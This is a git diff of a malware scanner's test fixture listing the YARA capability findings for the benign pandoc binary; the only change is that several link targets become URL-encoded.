[sendfile](https://github.com/search?q=sendfile&type=code) | diff --git a/tests/linux/clean/pandoc.md b/tests/linux/clean/pandoc.md index 2b017d3ac..4e29cc298 100644 --- a/tests/linux/clean/pandoc.md +++ b/tests/linux/clean/pandoc.md @@ -8,7 +8,7 @@ | MEDIUM | [c2/client](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/client.yara#clientID) | contains a client ID | [client_id](https://github.com/search?q=client_id&type=code) | | MEDIUM | [c2/discovery/dyndns](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/discovery/dyndns.yara#dynamic_dns_user) | uses dynamic DNS service | [dyndns](https://github.com/search?q=dyndns&type=code) | | MEDIUM | [c2/discovery/ip_dns_resolver](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/discovery/ip-dns_resolver.yara#cloudflare_dns_ip) | contains Cloudflare DNS resolver IP | [1.1.1.1](https://github.com/search?q=1.1.1.1&type=code) | -| MEDIUM | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref) | references multiple operating systems | [https://](https://)
[Windows](https://github.com/search?q=Windows&type=code)
[http://](http://)
[windows](https://github.com/search?q=windows&type=code)
[Linux](https://github.com/search?q=Linux&type=code)
[linux](https://github.com/search?q=linux&type=code)
[macOS](https://github.com/search?q=macOS&type=code) | +| MEDIUM | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref) | references multiple operating systems | [https://](https%3A%2F%2F)
[Windows](https://github.com/search?q=Windows&type=code)
[http://](http%3A%2F%2F)
[windows](https://github.com/search?q=windows&type=code)
[Linux](https://github.com/search?q=Linux&type=code)
[linux](https://github.com/search?q=linux&type=code)
[macOS](https://github.com/search?q=macOS&type=code) | | MEDIUM | [collect/archives/unarchive](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/unarchive.yara#unarchive) | unarchives files | [unarchived](https://github.com/search?q=unarchived&type=code) | | MEDIUM | [collect/archives/zip](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/zip.yara#zip) | Works with zip files | [ZIP64](https://github.com/search?q=ZIP64&type=code) | | MEDIUM | [collect/databases/mysql](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/mysql.yara#mysql) | accesses MySQL databases | [mysql](https://github.com/search?q=mysql&type=code) | @@ -72,7 +72,7 @@ | MEDIUM | [net/socket/raw](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/raw.yara#raw_sockets) | [send raw and/or malformed IP packets](https://man7.org/linux/man-pages/man7/raw.7.html) | [IPPROTO_RAW](https://github.com/search?q=IPPROTO_RAW&type=code)
[SOCK_RAW](https://github.com/search?q=SOCK_RAW&type=code) | | MEDIUM | [net/socket/reuseport](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/reuseport.yara#reuseport) | reuse TCP/IP ports for listening and connecting | [SO_REUSEADDR](https://github.com/search?q=SO_REUSEADDR&type=code)
[SO_REUSEPORT](https://github.com/search?q=SO_REUSEPORT&type=code) | | MEDIUM | [net/tcp/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tcp/ssh.yara#ssh) | Supports SSH (secure shell) | [SSH](https://github.com/search?q=SSH&type=code) | -| MEDIUM | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#http_url_with_php) | contains hardcoded PHP endpoint | [http://www.fictionbook.org/index.php](http://www.fictionbook.org/index.php) | +| MEDIUM | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#http_url_with_php) | contains hardcoded PHP endpoint | [http://www.fictionbook.org/index.php](http%3A%2F%2Fwww.fictionbook.org%2Findex.php) | | MEDIUM | [net/url/encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/encode.yara#url_encode) | encodes URL, likely to pass GET variables | [urlencode](https://github.com/search?q=urlencode&type=code) | | MEDIUM | [net/url/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/request.yara#requests_urls) | requests resources via URL | [openURL](https://github.com/search?q=openURL&type=code) | | MEDIUM | [net/webrtc](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/webrtc.yara#webrtc_peer) | makes outgoing WebRTC connections | [RTCPeerConnection](https://github.com/search?q=RTCPeerConnection&type=code) | @@ -85,7 +85,7 @@ | MEDIUM | [sus/intercept](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/intercept.yara#interceptor) | References interception | [intercept](https://github.com/search?q=intercept&type=code) | | LOW | [anti-behavior/random_behavior](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/random_behavior.yara#random) | uses a random number generator | [zdfldZCClientRandomZCunClientRandom](https://github.com/search?q=zdfldZCClientRandomZCunClientRandom&type=code)
[zdfldZCServerRandomZCunServerRandom](https://github.com/search?q=zdfldZCServerRandomZCunServerRandom&type=code)
[crypton_ed25519_randombytes_unsafe](https://github.com/search?q=crypton_ed25519_randombytes_unsafe&type=code)
[zdfShowClientRandomzuzdcshow_info](https://github.com/search?q=zdfShowClientRandomzuzdcshow_info&type=code)
[zdfShowServerRandomzuzdcshow_info](https://github.com/search?q=zdfShowServerRandomzuzdcshow_info&type=code)
[SystemziRandom_randomRIO_closure](https://github.com/search?q=SystemziRandom_randomRIO_closure&type=code)
[SystemziRandom_randomIO_closure](https://github.com/search?q=SystemziRandom_randomIO_closure&type=code)
[SystemziRandom_randomRs_closure](https://github.com/search?q=SystemziRandom_randomRs_closure&type=code)
[arbitraryBoundedRandom1_closure](https://github.com/search?q=arbitraryBoundedRandom1_closure&type=code)
[CryptoziRandom_drgNew1_closure](https://github.com/search?q=CryptoziRandom_drgNew1_closure&type=code)
[CryptoziRandom_drgNewSeed_info](https://github.com/search?q=CryptoziRandom_drgNewSeed_info&type=code)
[CryptoziRandom_drgNewTest_info](https://github.com/search?q=CryptoziRandom_drgNewTest_info&type=code)
[CryptoziRandom_seedFromBinary1](https://github.com/search?q=CryptoziRandom_seedFromBinary1&type=code)
[CryptoziRandom_seedFromInteger](https://github.com/search?q=CryptoziRandom_seedFromInteger&type=code)
[CryptoziRandom_seedNew_closure](https://github.com/search?q=CryptoziRandom_seedNew_closure&type=code)
[CryptoziRandom_withRandomBytes](https://github.com/search?q=CryptoziRandom_withRandomBytes&type=code)
[CryptoziRandom_zdsi2ospOf_info](https://github.com/search?q=CryptoziRandom_zdsi2ospOf_info&type=code)
[CryptoziRandom_zdtcSeed2_bytes](https://github.com/search?q=CryptoziRandom_zdtcSeed2_bytes&type=code)
[CryptoziRandomziTypes_zdtcDRG1](https://github.com/search?q=CryptoziRandomziTypes_zdtcDRG1&type=code)
[CryptoziRandomziTypes_zdtcDRG2](https://github.com/search?q=CryptoziRandomziTypes_zdtcDRG2&type=code)
[CryptoziRandomziTypes_zdtcDRG3](https://github.com/search?q=CryptoziRandomziTypes_zdtcDRG3&type=code)
[SystemziRandom_getStdGen1_info](https://github.com/search?q=SystemziRandom_getStdGen1_info&type=code)
[SystemziRandom_initStdGen_info](https://github.com/search?q=SystemziRandom_initStdGen_info&type=code)
[SystemziRandom_newStdGen1_info](https://github.com/search?q=SystemziRandom_newStdGen1_info&type=code)
[SystemziRandom_newStdGen2_info](https://github.com/search?q=SystemziRandom_newStdGen2_info&type=code)
[SystemziRandom_randomR_closure](https://github.com/search?q=SystemziRandom_randomR_closure&type=code)
[SystemziRandom_randoms_closure](https://github.com/search?q=SystemziRandom_randoms_closure&type=code)
[SystemziRandom_uniform_closure](https://github.com/search?q=SystemziRandom_uniform_closure&type=code)
[SystemziRandom_zddmrandom_info](https://github.com/search?q=SystemziRandom_zddmrandom_info&type=code)
[SystemziRandom_zdfRandomCFloat](https://github.com/search?q=SystemziRandom_zdfRandomCFloat&type=code)
[SystemziRandom_zdfRandomCLLong](https://github.com/search?q=SystemziRandom_zdfRandomCLLong&type=code)
[SystemziRandom_zdfRandomCSChar](https://github.com/search?q=SystemziRandom_zdfRandomCSChar&type=code)
[SystemziRandom_zdfRandomCShort](https://github.com/search?q=SystemziRandom_zdfRandomCShort&type=code)
[SystemziRandom_zdfRandomCSizze](https://github.com/search?q=SystemziRandom_zdfRandomCSizze&type=code)
[SystemziRandom_zdfRandomCUChar](https://github.com/search?q=SystemziRandom_zdfRandomCUChar&type=code)
[SystemziRandom_zdfRandomCULong](https://github.com/search?q=SystemziRandom_zdfRandomCULong&type=code)
[SystemziRandom_zdfRandomCWchar](https://github.com/search?q=SystemziRandom_zdfRandomCWchar&type=code)
[SystemziRandom_zdfRandomDouble](https://github.com/search?q=SystemziRandom_zdfRandomDouble&type=code)
[SystemziRandom_zdfRandomTuple2](https://github.com/search?q=SystemziRandom_zdfRandomTuple2&type=code)
[SystemziRandom_zdfRandomTuple3](https://github.com/search?q=SystemziRandom_zdfRandomTuple3&type=code)
[SystemziRandom_zdfRandomTuple4](https://github.com/search?q=SystemziRandom_zdfRandomTuple4&type=code)
[SystemziRandom_zdfRandomTuple5](https://github.com/search?q=SystemziRandom_zdfRandomTuple5&type=code)
[SystemziRandom_zdfRandomTuple6](https://github.com/search?q=SystemziRandom_zdfRandomTuple6&type=code)
[SystemziRandom_zdfRandomTuple7](https://github.com/search?q=SystemziRandom_zdfRandomTuple7&type=code)
[SystemziRandom_zdfRandomWord16](https://github.com/search?q=SystemziRandom_zdfRandomWord16&type=code)
[SystemziRandom_zdfRandomWord32](https://github.com/search?q=SystemziRandom_zdfRandomWord32&type=code)
[SystemziRandom_zdfRandomWord64](https://github.com/search?q=SystemziRandom_zdfRandomWord64&type=code)
[SystemziRandomziInternal_split](https://github.com/search?q=SystemziRandomziInternal_split&type=code)
[SystemziRandomziSplitMix_SMGen](https://github.com/search?q=SystemziRandomziSplitMix_SMGen&type=code)
[SystemziRandomziSplitMix_zdwgo](https://github.com/search?q=SystemziRandomziSplitMix_zdwgo&type=code)
[arbitraryBoundedRandom_closure](https://github.com/search?q=arbitraryBoundedRandom_closure&type=code)
[zdtcMonadPseudoRandom1_closure](https://github.com/search?q=zdtcMonadPseudoRandom1_closure&type=code)
[zdtczqCZCRandomAccess1_closure](https://github.com/search?q=zdtczqCZCRandomAccess1_closure&type=code)
[zdtczqCZCRandomAccess2_closure](https://github.com/search?q=zdtczqCZCRandomAccess2_closure&type=code)
[CryptoziRandom_drgNew_closure](https://github.com/search?q=CryptoziRandom_drgNew_closure&type=code)
[CryptoziRandom_zdsalloc1_info](https://github.com/search?q=CryptoziRandom_zdsalloc1_info&type=code)
[SystemziRandom_CZCRandom_info](https://github.com/search?q=SystemziRandom_CZCRandom_info&type=code)
[SystemziRandom_getStdGen_info](https://github.com/search?q=SystemziRandom_getStdGen_info&type=code)
[SystemziRandom_newStdGen_info](https://github.com/search?q=SystemziRandom_newStdGen_info&type=code)
[SystemziRandom_randomRIO_info](https://github.com/search?q=SystemziRandom_randomRIO_info&type=code)
[SystemziRandom_random_closure](https://github.com/search?q=SystemziRandom_random_closure&type=code)
[SystemziRandom_setStdGen_info](https://github.com/search?q=SystemziRandom_setStdGen_info&type=code)
[zdtcMonadPseudoRandom_closure](https://github.com/search?q=zdtcMonadPseudoRandom_closure&type=code)
[zdtczqCZCRandomAccess_closure](https://github.com/search?q=zdtczqCZCRandomAccess_closure&type=code)
[CryptoziRandom_seedNew2_info](https://github.com/search?q=CryptoziRandom_seedNew2_info&type=code)
[SystemziRandom_randomIO_info](https://github.com/search?q=SystemziRandom_randomIO_info&type=code)
[SystemziRandom_randomRs_info](https://github.com/search?q=SystemziRandom_randomRs_info&type=code)
[SystemziRandom_uniformR_info](https://github.com/search?q=SystemziRandom_uniformR_info&type=code)
[arbitraryBoundedRandom1_info](https://github.com/search?q=arbitraryBoundedRandom1_info&type=code)
[zdfShowClientRandom1_closure](https://github.com/search?q=zdfShowClientRandom1_closure&type=code)
[zdfShowServerRandom1_closure](https://github.com/search?q=zdfShowServerRandom1_closure&type=code)
[zdtcMonadPseudoRandom2_bytes](https://github.com/search?q=zdtcMonadPseudoRandom2_bytes&type=code)
[zdtczqCZCRandomAccess3_bytes](https://github.com/search?q=zdtczqCZCRandomAccess3_bytes&type=code)
[zdwbindRandomPortGen_closure](https://github.com/search?q=zdwbindRandomPortGen_closure&type=code)
[zdwbindRandomPortTCP_closure](https://github.com/search?q=zdwbindRandomPortTCP_closure&type=code)
[zdwzdsrandomIvalInteger_info](https://github.com/search?q=zdwzdsrandomIvalInteger_info&type=code)
[CryptoziRandom_drgNew1_info](https://github.com/search?q=CryptoziRandom_drgNew1_info&type=code)
[CryptoziRandom_seedNew_info](https://github.com/search?q=CryptoziRandom_seedNew_info&type=code)
[SystemziRandom_randomR_info](https://github.com/search?q=SystemziRandom_randomR_info&type=code)
[SystemziRandom_randoms_info](https://github.com/search?q=SystemziRandom_randoms_info&type=code)
[SystemziRandom_uniform_info](https://github.com/search?q=SystemziRandom_uniform_info&type=code)
[arbitraryBoundedRandom_info](https://github.com/search?q=arbitraryBoundedRandom_info&type=code)
[openssl_random_pseudo_bytes](https://github.com/search?q=openssl_random_pseudo_bytes&type=code)
[zdfShowClientRandom_closure](https://github.com/search?q=zdfShowClientRandom_closure&type=code)
[zdfShowServerRandom_closure](https://github.com/search?q=zdfShowServerRandom_closure&type=code)
[zdtczqCZCRandomGen1_closure](https://github.com/search?q=zdtczqCZCRandomGen1_closure&type=code)
[zdtczqCZCRandomGen2_closure](https://github.com/search?q=zdtczqCZCRandomGen2_closure&type=code)
[zdtczqClientRandom1_closure](https://github.com/search?q=zdtczqClientRandom1_closure&type=code)
[zdtczqClientRandom2_closure](https://github.com/search?q=zdtczqClientRandom2_closure&type=code)
[zdtczqServerRandom1_closure](https://github.com/search?q=zdtczqServerRandom1_closure&type=code)
[zdtczqServerRandom2_closure](https://github.com/search?q=zdtczqServerRandom2_closure&type=code)
[CryptoziRandom_drgNew_info](https://github.com/search?q=CryptoziRandom_drgNew_info&type=code)
[SystemziRandom_random_info](https://github.com/search?q=SystemziRandom_random_info&type=code)
[bindRandomPortGen1_closure](https://github.com/search?q=bindRandomPortGen1_closure&type=code)
[bindRandomPortTCP1_closure](https://github.com/search?q=bindRandomPortTCP1_closure&type=code)
[bindRandomPortUDP1_closure](https://github.com/search?q=bindRandomPortUDP1_closure&type=code)
[ldap_opt_x_tls_random_file](https://github.com/search?q=ldap_opt_x_tls_random_file&type=code)
[zdfShowClientRandom2_bytes](https://github.com/search?q=zdfShowClientRandom2_bytes&type=code)
[zdfShowClientRandom3_bytes](https://github.com/search?q=zdfShowClientRandom3_bytes&type=code)
[zdfShowServerRandom2_bytes](https://github.com/search?q=zdfShowServerRandom2_bytes&type=code)
[zdtczqCZCRandomGen_closure](https://github.com/search?q=zdtczqCZCRandomGen_closure&type=code)
[zdtczqClientRandom_closure](https://github.com/search?q=zdtczqClientRandom_closure&type=code)
[zdtczqServerRandom_closure](https://github.com/search?q=zdtczqServerRandom_closure&type=code)
[bindRandomPortUDP_closure](https://github.com/search?q=bindRandomPortUDP_closure&type=code)
[getClientRandom32_closure](https://github.com/search?q=getClientRandom32_closure&type=code)
[getServerRandom32_closure](https://github.com/search?q=getServerRandom32_closure&type=code)
[putClientRandom32_closure](https://github.com/search?q=putClientRandom32_closure&type=code)
[putServerRandom32_closure](https://github.com/search?q=putServerRandom32_closure&type=code)
[zdfEqClientRandom_closure](https://github.com/search?q=zdfEqClientRandom_closure&type=code)
[zdfEqServerRandom_closure](https://github.com/search?q=zdfEqServerRandom_closure&type=code)
[zdfRandomBoolzuzdcrandomR](https://github.com/search?q=zdfRandomBoolzuzdcrandomR&type=code)
[zdfRandomBoolzuzdcrandoms](https://github.com/search?q=zdfRandomBoolzuzdcrandoms&type=code)
[zdfRandomCBoolzuzdcrandom](https://github.com/search?q=zdfRandomCBoolzuzdcrandom&type=code)
[zdfRandomCCharzuzdcrandom](https://github.com/search?q=zdfRandomCCharzuzdcrandom&type=code)
[zdfRandomCIntzuzdcrandomR](https://github.com/search?q=zdfRandomCIntzuzdcrandomR&type=code)
[zdfRandomCIntzuzdcrandoms](https://github.com/search?q=zdfRandomCIntzuzdcrandoms&type=code)
[zdfRandomCLongzuzdcrandom](https://github.com/search?q=zdfRandomCLongzuzdcrandom&type=code)
[zdfRandomCPtrdiff_closure](https://github.com/search?q=zdfRandomCPtrdiff_closure&type=code)
[zdfRandomCUIntMax_closure](https://github.com/search?q=zdfRandomCUIntMax_closure&type=code)
[zdfRandomCUIntPtr_closure](https://github.com/search?q=zdfRandomCUIntPtr_closure&type=code)
[zdfRandomCUIntzuzdcrandom](https://github.com/search?q=zdfRandomCUIntzuzdcrandom&type=code)
[zdfRandomCharzuzdcrandomR](https://github.com/search?q=zdfRandomCharzuzdcrandomR&type=code)
[zdfRandomCharzuzdcrandoms](https://github.com/search?q=zdfRandomCharzuzdcrandoms&type=code)
[zdfRandomFloatzuzdcrandom](https://github.com/search?q=zdfRandomFloatzuzdcrandom&type=code)
[zdfRandomGenQCGen_closure](https://github.com/search?q=zdfRandomGenQCGen_closure&type=code)
[zdfRandomGenSMGen_closure](https://github.com/search?q=zdfRandomGenSMGen_closure&type=code)
[zdfRandomGenStateGen_info](https://github.com/search?q=zdfRandomGenStateGen_info&type=code)
[zdfRandomInt16zuzdcrandom](https://github.com/search?q=zdfRandomInt16zuzdcrandom&type=code)
[zdfRandomInt32zuzdcrandom](https://github.com/search?q=zdfRandomInt32zuzdcrandom&type=code)
[zdfRandomInt64zuzdcrandom](https://github.com/search?q=zdfRandomInt64zuzdcrandom&type=code)
[zdfRandomInt8zuzdcrandomR](https://github.com/search?q=zdfRandomInt8zuzdcrandomR&type=code)
[zdfRandomInt8zuzdcrandoms](https://github.com/search?q=zdfRandomInt8zuzdcrandoms&type=code)
[zdfRandomIntzuzdcrandomRs](https://github.com/search?q=zdfRandomIntzuzdcrandomRs&type=code)
[zdfRandomUUIDzuzdcrandomR](https://github.com/search?q=zdfRandomUUIDzuzdcrandomR&type=code)
[zdfRandomUUIDzuzdcrandoms](https://github.com/search?q=zdfRandomUUIDzuzdcrandoms&type=code)
[zdfRandomWord8zuzdcrandom](https://github.com/search?q=zdfRandomWord8zuzdcrandom&type=code)
[zdfRandomWordzuzdcrandomR](https://github.com/search?q=zdfRandomWordzuzdcrandomR&type=code)
[zdfRandomWordzuzdcrandoms](https://github.com/search?q=zdfRandomWordzuzdcrandoms&type=code)
[zdfShowClientRandom1_info](https://github.com/search?q=zdfShowClientRandom1_info&type=code)
[zdfShowServerRandom1_info](https://github.com/search?q=zdfShowServerRandom1_info&type=code)
[zdtcClientRandom1_closure](https://github.com/search?q=zdtcClientRandom1_closure&type=code)
[zdtcRandomAccess1_closure](https://github.com/search?q=zdtcRandomAccess1_closure&type=code)
[zdtcRandomAccess2_closure](https://github.com/search?q=zdtcRandomAccess2_closure&type=code)
[zdtcServerRandom1_closure](https://github.com/search?q=zdtcServerRandom1_closure&type=code)
[zdtczqCZCRandomGen3_bytes](https://github.com/search?q=zdtczqCZCRandomGen3_bytes&type=code)
[zdtczqClientRandom3_bytes](https://github.com/search?q=zdtczqClientRandom3_bytes&type=code)
[zdtczqDevURandom1_closure](https://github.com/search?q=zdtczqDevURandom1_closure&type=code)
[zdtczqDevURandom2_closure](https://github.com/search?q=zdtczqDevURandom2_closure&type=code)
[zdtczqServerRandom3_bytes](https://github.com/search?q=zdtczqServerRandom3_bytes&type=code)
[zdwbindRandomPortGen_info](https://github.com/search?q=zdwbindRandomPortGen_info&type=code)
[zdwbindRandomPortTCP_info](https://github.com/search?q=zdwbindRandomPortTCP_info&type=code)
[zdwrandomIvalInteger_info](https://github.com/search?q=zdwrandomIvalInteger_info&type=code)
[CZCRandomAccess_con_info](https://github.com/search?q=CZCRandomAccess_con_info&type=code)
[StabChainRandomPermGroup](https://github.com/search?q=StabChainRandomPermGroup&type=code)
[getClientRandom1_closure](https://github.com/search?q=getClientRandom1_closure&type=code)
[runPseudoRandom1_closure](https://github.com/search?q=runPseudoRandom1_closure&type=code)
[zdfMonadRandomIO_closure](https://github.com/search?q=zdfMonadRandomIO_closure&type=code)
[zdfRandomCDouble_closure](https://github.com/search?q=zdfRandomCDouble_closure&type=code)
[zdfRandomCIntMax_closure](https://github.com/search?q=zdfRandomCIntMax_closure&type=code)
[zdfRandomCIntPtr_closure](https://github.com/search?q=zdfRandomCIntPtr_closure&type=code)
[zdfRandomCULLong_closure](https://github.com/search?q=zdfRandomCULLong_closure&type=code)
[zdfRandomCUShort_closure](https://github.com/search?q=zdfRandomCUShort_closure&type=code)
[zdfRandomInteger_closure](https://github.com/search?q=zdfRandomInteger_closure&type=code)
[zdtcClientRandom_closure](https://github.com/search?q=zdtcClientRandom_closure&type=code)
[zdtcMonadRandom1_closure](https://github.com/search?q=zdtcMonadRandom1_closure&type=code)
[zdtcMonadRandom2_closure](https://github.com/search?q=zdtcMonadRandom2_closure&type=code)
[zdtcRandomAccess_closure](https://github.com/search?q=zdtcRandomAccess_closure&type=code)
[zdtcServerRandom_closure](https://github.com/search?q=zdtcServerRandom_closure&type=code)
[zdtczqDevRandom1_closure](https://github.com/search?q=zdtczqDevRandom1_closure&type=code)
[zdtczqDevRandom2_closure](https://github.com/search?q=zdtczqDevRandom2_closure&type=code)
[zdtczqDevURandom_closure](https://github.com/search?q=zdtczqDevURandom_closure&type=code)
[CZCMonadRandom_con_info](https://github.com/search?q=CZCMonadRandom_con_info&type=code)
[bindRandomPortGen1_info](https://github.com/search?q=bindRandomPortGen1_info&type=code)
[bindRandomPortTCP1_info](https://github.com/search?q=bindRandomPortTCP1_info&type=code)
[bindRandomPortUDP1_info](https://github.com/search?q=bindRandomPortUDP1_info&type=code)
[unClientRandom1_closure](https://github.com/search?q=unClientRandom1_closure&type=code)
[unServerRandom1_closure](https://github.com/search?q=unServerRandom1_closure&type=code)
[withRandomBytes_closure](https://github.com/search?q=withRandomBytes_closure&type=code)
[zdfRandomCFloat_closure](https://github.com/search?q=zdfRandomCFloat_closure&type=code)
[zdfRandomCLLong_closure](https://github.com/search?q=zdfRandomCLLong_closure&type=code)
[zdfRandomCSChar_closure](https://github.com/search?q=zdfRandomCSChar_closure&type=code)
[zdfRandomCShort_closure](https://github.com/search?q=zdfRandomCShort_closure&type=code)
[zdfRandomCSizze_closure](https://github.com/search?q=zdfRandomCSizze_closure&type=code)
[zdfRandomCUChar_closure](https://github.com/search?q=zdfRandomCUChar_closure&type=code)
[zdfRandomCULong_closure](https://github.com/search?q=zdfRandomCULong_closure&type=code)
[zdfRandomCWchar_closure](https://github.com/search?q=zdfRandomCWchar_closure&type=code)
[zdfRandomDouble_closure](https://github.com/search?q=zdfRandomDouble_closure&type=code)
[zdfRandomGenQCGen2_info](https://github.com/search?q=zdfRandomGenQCGen2_info&type=code)
[zdfRandomGenQCGen3_info](https://github.com/search?q=zdfRandomGenQCGen3_info&type=code)
[zdfRandomTuple2_closure](https://github.com/search?q=zdfRandomTuple2_closure&type=code)
[zdfRandomTuple3_closure](https://github.com/search?q=zdfRandomTuple3_closure&type=code)
[zdfRandomTuple4_closure](https://github.com/search?q=zdfRandomTuple4_closure&type=code)
[zdfRandomTuple5_closure](https://github.com/search?q=zdfRandomTuple5_closure&type=code)
[zdfRandomTuple6_closure](https://github.com/search?q=zdfRandomTuple6_closure&type=code)
[zdfRandomTuple7_closure](https://github.com/search?q=zdfRandomTuple7_closure&type=code)
[zdfRandomWord16_closure](https://github.com/search?q=zdfRandomWord16_closure&type=code)
[zdfRandomWord32_closure](https://github.com/search?q=zdfRandomWord32_closure&type=code)
[zdfRandomWord64_closure](https://github.com/search?q=zdfRandomWord64_closure&type=code)
[zdp1MonadRandom_closure](https://github.com/search?q=zdp1MonadRandom_closure&type=code)
[zdtcClientRandom2_bytes](https://github.com/search?q=zdtcClientRandom2_bytes&type=code)
[zdtcDevURandom1_closure](https://github.com/search?q=zdtcDevURandom1_closure&type=code)
[zdtcMonadRandom_closure](https://github.com/search?q=zdtcMonadRandom_closure&type=code)
[zdtcRandomAccess3_bytes](https://github.com/search?q=zdtcRandomAccess3_bytes&type=code)
[zdtcServerRandom2_bytes](https://github.com/search?q=zdtcServerRandom2_bytes&type=code)
[zdtczqDevRandom_closure](https://github.com/search?q=zdtczqDevRandom_closure&type=code)
[zdtczqDevURandom3_bytes](https://github.com/search?q=zdtczqDevURandom3_bytes&type=code)
[zdwserverRandom_closure](https://github.com/search?q=zdwserverRandom_closure&type=code)
[CZCMonadRandom_closure](https://github.com/search?q=CZCMonadRandom_closure&type=code)
[ClosureRandomPermGroup](https://github.com/search?q=ClosureRandomPermGroup&type=code)
[RandomNormalSubproduct](https://github.com/search?q=RandomNormalSubproduct&type=code)
[RandomSpecialPcgsCoded](https://github.com/search?q=RandomSpecialPcgsCoded&type=code)
[bindRandomPortUDP_info](https://github.com/search?q=bindRandomPortUDP_info&type=code)
[fann_randomize_weights](https://github.com/search?q=fann_randomize_weights&type=code)
[getClientRandom32_info](https://github.com/search?q=getClientRandom32_info&type=code)
[getRandomBytes_closure](https://github.com/search?q=getRandomBytes_closure&type=code)
[getRandomUUID1_closure](https://github.com/search?q=getRandomUUID1_closure&type=code)
[getRandomUUID2_closure](https://github.com/search?q=getRandomUUID2_closure&type=code)
[getServerRandom32_info](https://github.com/search?q=getServerRandom32_info&type=code)
[putClientRandom32_info](https://github.com/search?q=putClientRandom32_info&type=code)
[putServerRandom32_info](https://github.com/search?q=putServerRandom32_info&type=code)
[random_gamma_algorithm](https://github.com/search?q=random_gamma_algorithm&type=code)
[zdfRandomCBool_closure](https://github.com/search?q=zdfRandomCBool_closure&type=code)
[zdfRandomCChar_closure](https://github.com/search?q=zdfRandomCChar_closure&type=code)
[zdfRandomCLong_closure](https://github.com/search?q=zdfRandomCLong_closure&type=code)
[zdfRandomCUInt_closure](https://github.com/search?q=zdfRandomCUInt_closure&type=code)
[zdfRandomFloat_closure](https://github.com/search?q=zdfRandomFloat_closure&type=code)
[zdfRandomInt16_closure](https://github.com/search?q=zdfRandomInt16_closure&type=code)
[zdfRandomInt32_closure](https://github.com/search?q=zdfRandomInt32_closure&type=code)
[zdfRandomInt64_closure](https://github.com/search?q=zdfRandomInt64_closure&type=code)
[zdfRandomUUID1_closure](https://github.com/search?q=zdfRandomUUID1_closure&type=code)
[zdfRandomUUID2_closure](https://github.com/search?q=zdfRandomUUID2_closure&type=code)
[zdfRandomWord8_closure](https://github.com/search?q=zdfRandomWord8_closure&type=code)
[zdtcDevRandom1_closure](https://github.com/search?q=zdtcDevRandom1_closure&type=code)
[zdtcDevURandom_closure](https://github.com/search?q=zdtcDevURandom_closure&type=code)
[zdtcMonadRandom3_bytes](https://github.com/search?q=zdtcMonadRandom3_bytes&type=code)
[zdtcRandomGen1_closure](https://github.com/search?q=zdtcRandomGen1_closure&type=code)
[zdtcRandomGen2_closure](https://github.com/search?q=zdtcRandomGen2_closure&type=code)
[zdtczqDevRandom3_bytes](https://github.com/search?q=zdtczqDevRandom3_bytes&type=code)
[CZCRandomGen_con_info](https://github.com/search?q=CZCRandomGen_con_info&type=code)
[RandomIsomorphismTest](https://github.com/search?q=RandomIsomorphismTest&type=code)
[clientRandom1_closure](https://github.com/search?q=clientRandom1_closure&type=code)
[clientRandom2_closure](https://github.com/search?q=clientRandom2_closure&type=code)
[crypton_chacha_random](https://github.com/search?q=crypton_chacha_random&type=code)
[getClientRandom1_info](https://github.com/search?q=getClientRandom1_info&type=code)
[getRandomUUID_closure](https://github.com/search?q=getRandomUUID_closure&type=code)
[hrrRandomzuws_closure](https://github.com/search?q=hrrRandomzuws_closure&type=code)
[random_beta_algorithm](https://github.com/search?q=random_beta_algorithm&type=code)
[random_chi2_algorithm](https://github.com/search?q=random_chi2_algorithm&type=code)
[random_hypergeometric](https://github.com/search?q=random_hypergeometric&type=code)
[runPseudoRandom1_info](https://github.com/search?q=runPseudoRandom1_info&type=code)
[serverRandom1_closure](https://github.com/search?q=serverRandom1_closure&type=code)
[serverRandom2_closure](https://github.com/search?q=serverRandom2_closure&type=code)
[zdfRandomBool_closure](https://github.com/search?q=zdfRandomBool_closure&type=code)
[zdfRandomCInt_closure](https://github.com/search?q=zdfRandomCInt_closure&type=code)
[zdfRandomChar_closure](https://github.com/search?q=zdfRandomChar_closure&type=code)
[zdfRandomInt8_closure](https://github.com/search?q=zdfRandomInt8_closure&type=code)
[zdfRandomUUID_closure](https://github.com/search?q=zdfRandomUUID_closure&type=code)
[zdfRandomWord_closure](https://github.com/search?q=zdfRandomWord_closure&type=code)
[zdtcDevRandom_closure](https://github.com/search?q=zdtcDevRandom_closure&type=code)
[zdtcDevURandom2_bytes](https://github.com/search?q=zdtcDevURandom2_bytes&type=code)
[zdtcRandomGen_closure](https://github.com/search?q=zdtcRandomGen_closure&type=code)
[CZCRandomAccess_info](https://github.com/search?q=CZCRandomAccess_info&type=code)
[RandomTransformation](https://github.com/search?q=RandomTransformation&type=code)
[clientRandom_closure](https://github.com/search?q=clientRandom_closure&type=code)
[getStdRandom_closure](https://github.com/search?q=getStdRandom_closure&type=code)
[random_exp_algorithm](https://github.com/search?q=random_exp_algorithm&type=code)
[random_regular_graph](https://github.com/search?q=random_regular_graph&type=code)
[unClientRandom1_info](https://github.com/search?q=unClientRandom1_info&type=code)
[unServerRandom1_info](https://github.com/search?q=unServerRandom1_info&type=code)
[withRandomBytes_info](https://github.com/search?q=withRandomBytes_info&type=code)
[zddmrandomRs_closure](https://github.com/search?q=zddmrandomRs_closure&type=code)
[zdfRandomInt_closure](https://github.com/search?q=zdfRandomInt_closure&type=code)
[zdfRandomTuple2_info](https://github.com/search?q=zdfRandomTuple2_info&type=code)
